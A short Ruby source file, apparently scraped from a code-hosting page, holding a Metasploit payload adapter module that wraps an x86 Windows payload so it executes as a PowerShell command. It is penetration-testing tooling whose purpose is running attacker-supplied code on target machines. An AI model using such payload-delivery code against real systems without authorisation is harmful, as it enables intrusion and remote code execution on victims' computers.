39 lines
947 B
Ruby
39 lines
947 B
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
module MetasploitModule
|
|
include Msf::Payload::Adapter
|
|
include Msf::Exploit::Powershell
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'Powershell Exec',
|
|
'Description' => 'Execute an x86 payload from a command via PowerShell',
|
|
'Author' => 'Spencer McIntyre',
|
|
'Platform' => 'win',
|
|
'Arch' => ARCH_CMD,
|
|
'License' => MSF_LICENSE,
|
|
'AdaptedArch' => ARCH_X86,
|
|
'AdaptedPlatform' => 'win',
|
|
'RequiredCmd' => 'powershell'
|
|
)
|
|
)
|
|
end
|
|
|
|
def generate
|
|
payload = super
|
|
|
|
cmd_psh_payload(payload, ARCH_X86, remove_comspec: true)
|
|
end
|
|
|
|
def generate_payload_uuid(conf = {})
|
|
conf[:arch] ||= module_info['AdaptedArch']
|
|
conf[:platform] ||= module_info['AdaptedPlatform']
|
|
super
|
|
end
|
|
end
|